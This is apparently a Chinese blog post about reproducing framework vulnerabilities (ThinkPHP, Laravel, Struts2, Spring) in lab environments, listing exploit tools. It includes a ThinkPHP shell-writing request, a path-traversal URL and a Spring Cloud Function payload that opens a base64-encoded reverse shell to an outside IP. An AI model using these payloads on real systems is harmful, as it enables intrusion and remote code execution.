当前位置: 首页 > news >正文

开发框架安全ThinkPHPLaravelSpringBootStruts2SpringCloud复现

news 2025/7/20 5:58:50

PHP-ThinkphpLaravel

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架

综合工具:武器库-Thinkphp专检(3-6版本)

如何判断是TP6框架开发的web程序,基于源码、路径、图标、基于报错可发现

dex.php?=xxx 

在其6.0.13版本及以前

/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+shell.php

图片

图片

2、版本5.X命令执行

其5.0.23以前的版本,5.0.22/5.1.29等

Laravel是一套简洁、优雅的PHP Web开发框架(PHP WebFramework)。

漏洞复现,这里php5.0.23附近的版本可以使用Think的一些工具进行梭哈

图片

图片

图片

CVE-2021-3129 RCE

Laravel<=8.4.2

https://github.com/zhzyker/CVE-2021-3129

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

Java-Struct2Spring

ApacheStruts2是一个流行的开发Web应用框架,用于开发JavaEE应用

https://github.com/abc123info/Struts2VulsScanTools

特征是xxx.action之类的文件,直接上工具一键梭哈就行了,就不复现了,其实是vulhub环境除了问题,打不开,这里就偷个懒

图片

偷懒是不可能滴,这里开了一个vulfocus靶场来看一下

Spring-Core-RCE(CVE-2022-22965)

存在于Spring框架以及衍生的框架中,并JDK9.0及以上版本会受到影响

https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE

特征:

图片

直接getshell

图片

图片

SpringBoot目录遍历(CVE-2021-21234)vulfocus

Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。

这里图标就是小树叶,然后看一下

图片

图片

参考:blog.csdn.net/weixin_43165012/article/details/121152482

/manage/log/view?filename=etc/group&base=../../../../../../

SpringCloudFunctionSpel表达式注入 CVE-2022-22963 vulhub

SpringCloudFunction提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。

3.0.0.RELEASE <=SpringCloudFunction<=3.2.2

参考:https://developer.aliyun.com/article/1160011

POST:/functionRouter

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

SpringCloudGateway命令执行 (CVE-2022-22947)

参考:https://cloud.tencent.com/developer/article/2164533

SpringCloudGateway是Spring中的一个API网关。

SpringCloudGateway3.1.x <3.1.1

SpringCloudGateway3.0.x <3.0.7

其他旧的、不受支持的SpringCloudGateway 版本

监控配置不当利用:

见前面Actuator-heapdump利用讲解

这里开一个靶场

图片

这里开一个梭哈工具

图片

ok,这里就已经在跑了

图片

来试一下有没有什么说法,这个工具需要配合jndi来打,只需要把jdni服务器输入里面

图片

图片

综合CVE利用工具:

https://github.com/0x727/SpringBootExploit

https://github.com/13exp/SpringBoot-Scan-GUI

#Python-FlaskDjango

http://www.dtcms.com/a/287299.html

相关文章:

  • 中间件安全攻防全解:从Tomcat到Weblogic反序列化漏洞介绍
  • 【Oracle】ORACLE OMF说明
  • windows 如何安装 wsl ubuntu
  • PostgreSQL 语法详解
  • Kubernetes常用命令总结
  • 突破研究边界!探索OpenAI o3与o4-mini模型的无限可能
  • Leetcode 05 java
  • Uniapp之自定义图片预览
  • CSS面试题及详细答案140道之(81-100)
  • 深度学习图像分类数据集—六十种植物病害分类
  • 微信小程序171~180
  • 嵌入式硬件中电感的基本原理与实现详解
  • 六种经典排序算法:从原理到 Java 实现
  • LVS的简介以及架构
  • 闲庭信步使用图像验证平台加速FPGA的开发:第二十四课——图像直方图和RGB图像叠加的FPGA实现
  • 【超详细笔记】概率:中心极限定理的直观理解——样本均值为何趋近正态
  • OpenCV 官翻 2 - 图像处理
  • 聊聊接口测试Postman环境与变量的深度应用
  • 黑马点评系列问题之p70postman报错“服务器异常”
  • Windows11下编译好的opencv4.8-mingw,可下载后直接用
  • 如何解决AttributeError: ‘NoneType‘ object has no attribute问题
  • 深入解析Linux文件重定向原理与dup2系统调用
  • Selenium 中 findElement 方法全解析:定位网页元素的 7 种方式
  • opencv圖片標注
  • 【办公类-107-02】20250719视频MP4转gif(削减MB)
  • 【Project】kafka+flume+davinci广告点击实时分析系统
  • LangGraph教程6:LangGraph工作流人机交互
  • 黄山派lvgl8学习笔记(1)画一个一个全白的背景
  • 【C++】入门阶段
  • Spring Cloud Gateway与Envoy Sidecar在微服务请求路由中的架构设计分享